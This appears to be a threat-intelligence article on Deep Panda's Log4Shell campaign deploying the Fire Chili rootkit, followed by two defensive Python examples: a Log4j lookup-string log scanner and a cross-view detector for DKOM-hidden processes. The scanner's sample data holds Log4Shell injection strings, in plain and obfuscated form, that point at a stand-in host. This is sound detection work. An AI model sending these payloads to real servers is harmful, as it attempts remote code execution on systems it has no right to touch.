This month, Deep Panda launched new cyberattacks that use Log4Shell to spread the new Fire Chili rootkit. Deep Panda is an advanced persistent threat (APT) group from China that has been active for at least ten years. It targets government, defense, healthcare, financial, telecommunications and other organizations for data theft and surveillance.
Among the tools the group is known to use are the Milestone backdoor and the Infoadmin Remote Access Trojan (RAT), which is based on the Gh0st RAT code. Deep Panda may also be affiliated with Winnti, a distinct Chinese threat actor known for targeting game developers and distributors. According to FortiGuard Labs researchers, Deep Panda has launched a new campaign aimed at companies in the financial, tourism, and cosmetics industries.
Over the past month, FortiGuard observed the group actively exploiting Log4Shell, a critical flaw in the Apache Log4j Java logging library (CVE-2021-44228, CVSS 10.0), to deploy a new rootkit. Several other groups also use Log4Shell to compromise VMware Horizon servers for cryptojacking and data exfiltration.
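The defender's first question after a report like this is whether Log4j lookup strings have reached their own web tier. The following Python is an added example, not FortiGuard's code, and it does not reproduce any artifact from the campaign: it scans constructed sample access-log lines for the `${jndi:` lookup that CVE-2021-44228 hinges on, first undoing the common `${lower:x}`, `${upper:x}` and `${...:-x}` nesting tricks that attackers use to defeat naive string matches. The log lines, IP addresses (from the 203.0.113.0/24 documentation range) and timestamps are all constructed.

```python
import re
from typing import Dict, List

# Constructed sample access-log lines (not from the page). Lines 1-3 carry
# Log4j lookup strings in plain and obfuscated form; lines 0 and 4 are benign.
SAMPLE_LOGS = [
    '10.0.0.5 - - [01/Mar/2022:10:01:02 +0000] "GET /portal HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [01/Mar/2022:10:01:05 +0000] "GET / HTTP/1.1" 200 77 "-" '
    '"${jndi:ldap://203.0.113.10:1389/a}"',
    '10.0.0.9 - - [01/Mar/2022:10:01:06 +0000] "GET / HTTP/1.1" 200 77 "-" '
    '"${${lower:j}ndi:${lower:r}mi://203.0.113.10:1099/b}"',
    '10.0.0.9 - - [01/Mar/2022:10:01:07 +0000] "GET / HTTP/1.1" 200 77 "-" '
    '"${${::-j}${::-n}${::-d}${::-i}:dns://203.0.113.10/c}"',
    '10.0.0.12 - - [01/Mar/2022:10:01:09 +0000] "GET /robots.txt HTTP/1.1" 200 30 "-" '
    '"Mozilla/5.0 (compatible; Googlebot/2.1)"',
]

# ${lower:x} / ${upper:x} wrap a single character; ${anything:-x} yields the
# default value x when the lookup is undefined. Both collapse to x.
_CASE_WRAPPER = re.compile(r"\$\{(?:lower|upper):([^${}])\}", re.IGNORECASE)
_DEFAULT_VALUE = re.compile(r"\$\{[^${}]*:-([^${}]*)\}")
# After normalisation the lookup has the shape ${jndi:<protocol>:...}
_JNDI = re.compile(r"\$\{jndi:([a-z]+):")


def normalize(line: str) -> str:
    """Collapse nested Log4j lookup wrappers until nothing changes, then lowercase."""
    prev = None
    while prev != line:
        prev = line
        line = _CASE_WRAPPER.sub(lambda m: m.group(1), line)
        line = _DEFAULT_VALUE.sub(lambda m: m.group(1), line)
    return line.lower()


def scan(lines: List[str]) -> List[Dict[str, object]]:
    """Return one finding per line that contains a (possibly obfuscated) JNDI lookup."""
    findings = []
    for idx, raw in enumerate(lines):
        norm = normalize(raw)
        match = _JNDI.search(norm)
        if match:
            findings.append({"line": idx, "protocol": match.group(1), "normalized": norm})
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_LOGS):
        print(f"line {f['line']}: jndi lookup via {f['protocol']}")
```

The normalisation loop is the part worth keeping: a single-pass regex for `${jndi:` misses the nested forms on lines 2 and 3, while repeated unwrapping reduces them to the same canonical string. Run the same function over real logs only after confirming the log format keeps the full `User-Agent` and request headers, since that is where these strings usually arrive.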
In Deep Panda’s campaign, the new rootkit, dubbed Fire Chili, is used together with the Milestone backdoor to keep the intrusion hidden. Fire Chili is signed with a stolen digital certificate, the same one Winnti has used to sign malicious software, and it first checks whether the target machine is booted in safe mode.
“It then checks the operating system version,” said the researchers. “The rootkit uses Direct Kernel Object Modification (DKOM), which involves undocumented kernel structures and objects, for its operations. For this reason, it relies on specific OS builds, as otherwise it may cause the infected machine to crash.”
Windows 10 Creators Update (Redstone 2) is the most recent supported build. The drivers are used to hide malicious artifacts from the security mechanisms already in place. The rootkit also tampers with the registry to prevent its malicious processes from being terminated, and it registers a callback to hide newly created processes from tools such as Task Manager.
The researchers obtained four driver samples, 32-bit and 64-bit, compiled in 2017. The samples were signed with certificates stolen from gambling companies in the United States and Korea. The rootkit can also hide registry keys and TCP network connections. The Milestone backdoor is then deployed on the compromised system to enable persistent data theft. The researchers also uncovered a dropper that carries a Milestone loader.
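A DKOM rootkit that unlinks processes and connections from the kernel's bookkeeping, as described above for Fire Chili's hidden processes and hidden TCP connections, is found by cross-view analysis: enumerate the same objects through the normal API (the view Task Manager or netstat shows) and through a path that does not depend on the kernel's linked lists (for instance a pool scan of a memory image), then report what only the independent path sees. The Python below is an added example and not FortiGuard's tooling; the process and connection records, PIDs and addresses are constructed. It also handles the usual false positive of this method, an object that simply exited between the two enumerations, by requiring a hidden object to persist across two independent snapshots while never appearing in any API snapshot.

```python
from dataclasses import dataclass
from typing import List, Sequence, TypeVar

T = TypeVar("T")


@dataclass(frozen=True)
class Proc:
    """Minimal process record shared by both enumeration paths (constructed)."""
    pid: int
    image: str


@dataclass(frozen=True)
class Conn:
    """Minimal TCP connection record (constructed)."""
    pid: int
    local: str
    remote: str


def hidden_objects(api_snapshots: Sequence[Sequence[T]],
                   independent_snapshots: Sequence[Sequence[T]]) -> List[T]:
    """Cross-view diff.

    Flags objects that appear in *every* independent snapshot (so they are
    stable, not a race with process exit) but in *no* API snapshot (so the
    normal enumeration path never showed them). Both inputs need at least one
    snapshot; two or more independent snapshots give the exit-race filtering.
    """
    seen_by_api = set().union(*(set(s) for s in api_snapshots))
    stable_independent = set(independent_snapshots[0])
    for snap in independent_snapshots[1:]:
        stable_independent &= set(snap)
    return sorted(stable_independent - seen_by_api, key=lambda o: o.pid)


# Constructed sample data. The API view loses notepad.exe between snapshots
# because it exited; the independent view additionally sees PID 3380, which
# never appears to the API, and PID 4410, which exited before the second scan.
API_PROCS = [
    [Proc(4, "System"), Proc(612, "services.exe"), Proc(1120, "explorer.exe"), Proc(2204, "notepad.exe")],
    [Proc(4, "System"), Proc(612, "services.exe"), Proc(1120, "explorer.exe")],
]
SCAN_PROCS = [
    [Proc(4, "System"), Proc(612, "services.exe"), Proc(1120, "explorer.exe"),
     Proc(2204, "notepad.exe"), Proc(3380, "svchost.exe"), Proc(4410, "conhost.exe")],
    [Proc(4, "System"), Proc(612, "services.exe"), Proc(1120, "explorer.exe"), Proc(3380, "svchost.exe")],
]

# Same idea for TCP connections: the hidden process also has a hidden socket.
API_CONNS = [
    [Conn(1120, "10.0.0.7:49811", "198.51.100.20:443")],
    [Conn(1120, "10.0.0.7:49811", "198.51.100.20:443")],
]
SCAN_CONNS = [
    [Conn(1120, "10.0.0.7:49811", "198.51.100.20:443"), Conn(3380, "10.0.0.7:49900", "203.0.113.45:443")],
    [Conn(1120, "10.0.0.7:49811", "198.51.100.20:443"), Conn(3380, "10.0.0.7:49900", "203.0.113.45:443")],
]


def report() -> List[str]:
    """Human-readable summary of both cross-view checks."""
    lines = [f"hidden process: pid={p.pid} image={p.image}" for p in hidden_objects(API_PROCS, SCAN_PROCS)]
    lines += [f"hidden connection: pid={c.pid} {c.local} -> {c.remote}"
              for c in hidden_objects(API_CONNS, SCAN_CONNS)]
    return lines


if __name__ == "__main__":
    print("\n".join(report()))
```

The records here are plain dataclasses so the diff logic is the whole program; in practice the API snapshots come from a live-response tool and the independent snapshots from a memory-forensics pool scan of the same host. The rootkit's safe-mode and OS-version checks also suggest a cheap complementary control: a driver that refuses to load on builds newer than Creators Update will show up as a failed or absent load on patched hosts, which is itself worth logging.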